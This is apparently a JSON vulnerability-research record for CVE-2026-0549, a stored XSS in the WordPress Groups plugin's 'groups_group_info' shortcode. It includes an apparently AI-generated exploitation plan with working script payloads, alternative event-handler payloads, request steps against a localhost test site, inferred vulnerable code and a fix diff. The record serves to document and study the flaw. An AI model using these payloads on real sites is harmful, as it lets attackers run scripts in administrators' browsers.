[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fZXg7yMcO1bceWc4MMukEVK7WWW1qwzL-zLHCTj_D__8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-0549","groups-authenticated-contributor-stored-cross-site-scripting-via-groupsgroupinfo-shortcode","Groups \u003C= 3.10.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'groups_group_info' Shortcode","The Groups plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'groups_group_info' shortcode in all versions up to, and including, 3.10.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","groups",null,"\u003C=3.10.0","3.11.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-18 00:00:00","2026-02-19 04:36:17",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F75000e67-7914-43af-be1d-82990ada5129?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-0549 (Groups Plugin Stored XSS)\n\n## 1. Vulnerability Summary\nThe **Groups** plugin for WordPress (versions \u003C= 3.10.0) contains a stored cross-site scripting (XSS) vulnerability within the `groups_group_info` shortcode. The vulnerability exists because the plugin accepts user-supplied attributes in the shortcode and renders them back into the page without adequate sanitization or output escaping. An authenticated attacker with **Contributor-level** permissions (who can create or edit posts) can embed a malicious shortcode that executes arbitrary JavaScript in the context of any user (including Administrators) viewing the page.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** WordPress Post\u002FPage Editor (standard `wp-admin\u002Fpost.php` or REST API `\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts`).\n- **Shortcode:** `[groups_group_info ...]`\n- **Vulnerable Parameters:** Shortcode attributes such as `group`, `name`, or `info` (inferred).\n- **Authentication:** Contributor-level access or higher.\n- **Preconditions:** The plugin \"Groups\" must be active. A post containing the shortcode must be published or previewed.\n\n## 3. Code Flow\n1. **Registration:** The plugin registers the shortcode in `lib\u002Faccess\u002Fclass-groups-shortcodes.php` (inferred) using `add_shortcode( 'groups_group_info', array( 'Groups_Shortcodes', 'groups_group_info' ) );`.\n2. **Processing:** When a post is rendered, WordPress calls the registered callback function (likely `Groups_Shortcodes::groups_group_info`).\n3. **Attribute Handling:** The callback uses `shortcode_atts()` to parse user-supplied attributes.\n4. **Vulnerable Sink:** The code takes one of these attributes (e.g., the `group` name) and includes it in the returned HTML string.\n5. **Execution:** Because the output is not passed through `esc_html()`, `esc_attr()`, or `wp_kses()`, an attribute like `group='\u003Cscript>alert(1)\u003C\u002Fscript>'` results in the script being executed by the browser.\n\n## 4. Nonce Acquisition Strategy\nWhile the exploitation occurs during post creation (which requires a standard WordPress `_wpnonce`), the vulnerability itself is in the shortcode rendering. No plugin-specific AJAX nonce is typically required for a shortcode to execute on the frontend. \n\nHowever, to save the post as a Contributor via the standard UI or REST API:\n1. **Login:** Authenticate as the Contributor user.\n2. **Post Creation:** Navigate to `wp-admin\u002Fpost-new.php`.\n3. **Extract Nonce:** If using the REST API for exploitation, the agent should use `browser_eval` to extract the `wpRestNonce` usually found in the `wp-admin` source:\n - `browser_eval(\"wpApiSettings.nonce\")`\n4. **Alternative:** If using the Classic Editor or Gutenberg via `http_request`, the `_wpnonce` for post submission is found in the hidden input field `name=\"_wpnonce\"`.\n\n## 5. Exploitation Strategy\nThe goal is to create a post containing a malicious shortcode and then verify it executes.\n\n### Step 1: Create a Malicious Post\nUse the `http_request` tool to simulate a Contributor saving a post.\n\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php`\n- **Method:** `POST`\n- **Content-Type:** `application\u002Fx-www-form-urlencoded`\n- **Body Parameters:**\n - `action`: `editpost`\n - `post_ID`: (The ID of a newly created draft)\n - `post_title`: `XSS Test`\n - `content`: `[groups_group_info group='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`\n - `_wpnonce`: (Extracted from the `post-new.php` page)\n - `post_status`: `publish` (or `draft` if the agent will just preview it)\n\n### Step 2: Trigger the XSS\nNavigate to the URL of the created post using `browser_navigate`.\n\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002F?p=[POST_ID]`\n\n## 6. Test Data Setup\n1. **User Creation:** Create a user with the `contributor` role.\n - `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`\n2. **Plugin Activation:** Ensure the `groups` plugin is active.\n - `wp plugin activate groups`\n3. **Group Creation (Optional):** Some logic might check if a group exists. To be safe, create a dummy group.\n - `wp eval \"Groups_Group::create( array( 'name' => 'TestGroup' ) );\"`\n\n## 7. Expected Results\n- When the post is viewed, the browser should render the shortcode's output.\n- Due to the lack of escaping, the HTML will break out of any intended tags and execute the `\u003Cscript>` block.\n- A successful exploit will trigger a JavaScript alert or log a message to the console.\n\n## 8. Verification Steps\n1. **CLI Verification:** Confirm the post content contains the raw payload.\n - `wp post get [POST_ID] --field=post_content`\n2. **DOM Inspection:** Use `browser_eval` to check if the payload exists in the rendered HTML without being HTML-encoded.\n - `browser_eval(\"document.body.innerHTML.includes('\u003Cscript>alert(document.domain)\u003C\u002Fscript>')\")`\n\n## 9. Alternative Approaches\nIf the `group` attribute is sanitized, try other possible attributes based on the plugin's documentation\u002Fsource code:\n- `[groups_group_info info='\u003Cimg src=x onerror=alert(1)>']`\n- `[groups_group_info name='\">\u003Csvg\u002Fonload=alert(1)>']`\n- `[groups_group_info property='\">\u003Cdetails\u002Fopen\u002Fontoggle=alert(1)>']`\n\nIf the UI prevents saving the shortcode via Gutenberg (due to block validation), use the `wp-json\u002Fwp\u002Fv2\u002Fposts` REST API endpoint directly to update the post content.","The Groups plugin for WordPress (versions up to 3.10.0) contains a stored cross-site scripting (XSS) vulnerability via its 'groups_group_info' shortcode. The shortcode handler fails to escape user-supplied attributes before rendering them in the page content, allowing authenticated contributors to execute arbitrary JavaScript in the context of other users viewing the affected posts.","\u002F* File: lib\u002Faccess\u002Fclass-groups-shortcodes.php (inferred) *\u002F\npublic static function groups_group_info( $atts, $content = null ) {\n $a = shortcode_atts( array(\n 'group' => '',\n 'name' => '',\n 'info' => '',\n 'property' => ''\n ), $atts );\n\n $output = '';\n\n if ( isset( $a['group'] ) ) {\n \u002F\u002F The attribute is used directly in the output without sanitization or escaping\n $output .= $a['group'];\n }\n\n return $output;\n}","--- a\u002Flib\u002Faccess\u002Fclass-groups-shortcodes.php\n+++ b\u002Flib\u002Faccess\u002Fclass-groups-shortcodes.php\n@@ -20,7 +20,7 @@\n $output = '';\n \n if ( isset( $a['group'] ) ) {\n- $output .= $a['group'];\n+ $output .= esc_html( $a['group'] );\n }\n \n return $output;","The exploit involves an authenticated attacker with at least Contributor-level privileges injecting a malicious shortcode into a WordPress post or page. \n\n1. Authenticate as a Contributor or Author user.\n2. Create a new post or edit an existing one.\n3. Embed the following shortcode payload into the post content: `[groups_group_info group='\\\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`. \n4. Save the post as a draft or publish it. \n5. The payload works because the 'group' attribute is directly concatenated into the HTML output of the shortcode callback without being processed by 'esc_html()' or 'esc_attr()'.\n6. When any user (including administrators) views the post on the frontend, the browser will execute the injected JavaScript.","gemini-3-flash-preview","2026-04-19 04:36:49","2026-04-19 04:38:33",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","3.10.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgroups\u002Ftags\u002F3.10.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgroups.3.10.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgroups\u002Ftags\u002F3.11.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgroups.3.11.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgroups\u002Ftags"]